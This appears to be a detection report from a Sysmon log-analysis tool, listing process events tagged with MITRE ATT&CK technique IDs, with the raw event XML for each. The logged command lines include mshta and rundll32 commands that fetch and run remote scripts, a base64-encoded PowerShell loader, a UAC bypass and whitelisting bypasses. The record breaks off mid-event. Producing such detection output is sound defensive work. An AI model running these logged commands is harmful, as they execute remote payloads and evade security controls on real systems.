/INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6175 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.383 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6175 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.383 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5410 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 11:23:17.702 + 747F3D96-6EA5-5D45-0000-00108FD3E100 + 7844 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6EA5-5D45-0000-0010EED0E100 + 4768 + C:\Windows\SysWOW64\WerFault.exe + C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5308 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:51:47.872 + 747F3D96-6743-5D45-0000-001068D7B500 + 6456 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6742-5D45-0000-00104A66B500 + 6380 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 32 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2196442 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-13 20:11:42.277 + 00247C92-09FE-5F86-0000-0010AC861401 + 6372 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\Windows\System32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-DE70-5F85-0000-002059F80600 + 0x6f859 + 1 + Medium + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-09FE-5F86-0000-001051841401 + 1716 + C:\Windows\System32\wuauclt.exe + wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4125 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-4F8A-5CE3-0000-0010C5BB4800 + 3548 + C:\Windows\System32\cmd.exe + "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429137 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:13.976 + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + 10.0.18362.1316 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 00247C92-1749-6010-0000-0010348FD92E + 2988 + C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe + C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5979 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.084 + 365ABB72-3D70-5CEB-0000-0010F2DEFF00 + 2772 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16248 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:35.289 + 365ABB72-69A3-5CD7-0000-00109D7F2200 + 1860 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-DC77-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-69A3-5CD7-0000-001064792200 + 3432 + C:\Windows\System32\taskeng.exe + taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4902 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.241 + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6173 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:44.023 + 365ABB72-FE6C-5CEB-0000-0010050C0C00 + 3520 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16452 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:09.573 + 365ABB72-2B21-5CD8-0000-001039DD2500 + 816 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine ("C:\Windows\system32\eventvwr.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + 